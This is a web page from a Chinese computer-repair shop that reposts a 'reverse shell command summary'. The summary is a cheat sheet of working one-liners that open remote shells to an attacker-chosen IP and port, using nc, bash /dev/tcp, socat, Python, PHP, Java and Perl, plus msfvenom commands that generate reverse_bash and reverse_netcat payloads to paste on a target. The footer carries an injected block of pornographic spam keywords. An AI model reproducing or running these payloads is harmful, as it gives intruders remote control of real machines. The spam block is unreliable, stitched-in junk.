錦州市廣廈電腦維修|上門維修電腦|上門做系統(tǒng)|0416-3905144熱誠服務(wù),錦州廣廈維修電腦,公司IT外包服務(wù)
topFlag1 設(shè)為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務(wù)項目 服務(wù)報價 維修流程 IT外包服務(wù) 服務(wù)器維護 技術(shù)文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統(tǒng)|0416-3905144熱誠服務(wù)技術(shù)文章
反彈shell命令總結(jié)

作者: 佚名  日期:2023-07-13 17:19:21   來源: 本站整理

反彈shell命令總結(jié)

1.nc反彈

開啟本地8080端口監(jiān)聽,并將本地的bash發(fā)布出去。
root# nc -lvvp 8080 -t -e /bin/bash
在這里插入圖片描述

連接目標(biāo)主機
nc ip 端口
在這里插入圖片描述

2.bash直接反彈

kali監(jiān)聽
在這里插入圖片描述
靶機運行:
root# bash -i >& /dev/tcp/ip/端口 0>&1
在這里插入圖片描述
bash命令解析:
在這里插入圖片描述
反彈成功
在這里插入圖片描述

3. socat反彈

kali監(jiān)聽:socat tcp-listen:1234 -
在這里插入圖片描述
靶機運行:
socat exec:‘bash -li’,pty,stderr,setsid,sigint,sane tcp:IP:1234
在這里插入圖片描述
反彈成功
在這里插入圖片描述

4.腳本反彈

4.1:python反彈

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);

s.connect(("IP",Port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 

4.2:php反彈

php -r '$sock=fsockopen("IP",PORT);exec("/bin/sh -i <&3 >&3 2>&3");' 

4.3:java反彈

r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/IP/port;cat <&5 |

while read line; do $line 2>&5 >&5; done"] as String[]) p.waitFor() 

4.4:perl反彈

perl -e 'use Socket;$i="IP";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));

if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 

.msf獲取反彈一句話

可以直接使用 msfvenom -l 結(jié)合關(guān)鍵字過濾(如cmd/unix/reverse),找出需要的各類反彈一句話payload的路徑信息。

# msfvenom -l payloads 'cmd/unix/reverse' 

發(fā)現(xiàn)msf支持反彈shell類型豐富。可以根據(jù)需求選擇。

在這里插入圖片描述
例如:生成bash的

# root@kali:~# msfvenom -p cmd/unix/reverse_bash lhost=1.1.1.1 lport=6666 R 

將生成的payload粘貼,在靶機運行即可。
在這里插入圖片描述
生成netcat

msfvenom -p cmd/unix/reverse_netcat lhost=1.1.1.1 lport=12345 R 

將生成的payload粘貼,在靶機運行即可。
在這里插入圖片描述
靶機運行payload:
在這里插入圖片描述
成功反彈
在這里插入圖片描述



熱門文章
  • L1正則化和L2正則化
  • 在Linux系統(tǒng)下,可以使用以下方法和...
  • 主板型號怎么看?小編將給大家介紹...
  • win10在激活界面會提示無法訪問激活...
  • 360日歷怎么卸載?360日歷怎么徹底...
  • 墨魚丸是什么怎么卸載?墨魚丸視頻...
  • Win10打開壓縮文件提示安全警告的解...
  • Linux高頻常用指令匯總
  • 150個CMD命令(史上更全cmd命令 net...
  • 線性回歸算法
  • HTTPS和HTTP的主要區(qū)別
  • Oracle 炮轟、Ubuntu 看戲,紅帽被...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯(lián)系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務(wù)區(qū)域: 遼寧錦州市區(qū)
    主要業(yè)務(wù): 修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網(wǎng)設(shè)置,IT服務(wù)外包,局域網(wǎng)組建,ADSL共享上網(wǎng),路由器設(shè)置,數(shù)據(jù)恢復(fù),密碼破解,光盤刻錄制作等服務(wù)

    技術(shù)支持:微軟等
    主站蜘蛛池模板: 亚洲成A人片在线观看无码不卡| 无码成人一区二区| 国产精品白浆无码流出| 亚洲精品无码国产片| 国产成人精品无码专区| 国产在线精品无码二区| 色综合久久久无码网中文| 亚洲午夜无码片在线观看影院猛| 亚洲av成人无码久久精品| 国产在线无码视频一区| 亚洲AV永久无码区成人网站| 无码人妻丰满熟妇区五十路| 亚洲AV无码精品色午夜在线观看| 亚洲a∨无码精品色午夜| 亚洲精品无码乱码成人| 国产精品无码无卡无需播放器| 蜜桃无码一区二区三区| 亚洲精品无码国产| 国产激情无码一区二区三区| 亚洲AV永久无码精品一福利 | 久久午夜夜伦鲁鲁片免费无码影视| 亚洲精品无码专区在线播放| 无码无套少妇毛多18p| 亚洲AV蜜桃永久无码精品| 久久久国产精品无码一区二区三区 | 九九无码人妻一区二区三区| 亚洲AV无码一区二区二三区入口 | 无码囯产精品一区二区免费| 亚洲熟妇无码另类久久久| 熟妇人妻中文a∨无码| 精品无码人妻一区二区三区不卡| 少妇无码AV无码专区线| 无码里番纯肉h在线网站| 亚洲熟妇无码久久精品| 亚洲AV无码久久久久网站蜜桃| 无码一区二区三区| 亚洲av无码片在线观看| 中文字幕av无码一二三区电影| 久久久无码一区二区三区| 亚洲av专区无码观看精品天堂| 日韩精品人妻系列无码专区|